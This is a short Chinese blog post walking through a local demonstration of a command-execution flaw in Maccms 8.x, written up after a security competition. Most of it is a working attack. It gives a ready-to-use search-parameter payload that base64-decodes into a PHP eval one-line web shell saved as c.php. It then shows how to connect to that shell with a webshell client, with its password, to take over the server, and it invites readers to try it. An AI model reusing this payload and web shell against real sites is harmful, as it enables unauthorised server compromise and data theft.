苹果cms8.x 命令执行漏洞本地攻击演示

新出道信息安全爱好者,有很多需要学习的地方,愿有一天能追上大佬步伐。
好了,下面进入正题,上半年6月份参加了铁人三项赛,线下web题为Maccms8.x ,当时也是通过团队协作以及百度资源成功破解服务器,现在我搭建了靶机,具体步骤写出来。
1.准备:phpstudy+Maccms8.x 源码
搭建成功后我们先来访问一下
在这里插入图片描述 因为Maccms8.x 存在命令执行漏洞,所以我们先点击search,接着直接上传我们构造的一句话木马payload:wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}
然后直接点击Execute上传,见上图hackbar。
验证是否上传成功:我们来看一下靶机的源目录,可以看到多出来一个c.php的文件,说明上传已成功。
在这里插入图片描述然后我们直接用菜刀来连接即可(地址:http://localhost/c.php,密码c)
在这里插入图片描述成功连接后,我们可以看到服务机下面的所有文件了,可以说我们已经控制了这台服务器,自此,入侵演示成功。
在这里插入图片描述如果有兴趣的童鞋赶紧去试试吧。
这条路,很黑很远,但是我没有想到,是这么黑,这么远… 致有一颗黑客梦的你!

猜你喜欢

转载自blog.csdn.net/qq_42383069/article/details/83626019
今日推荐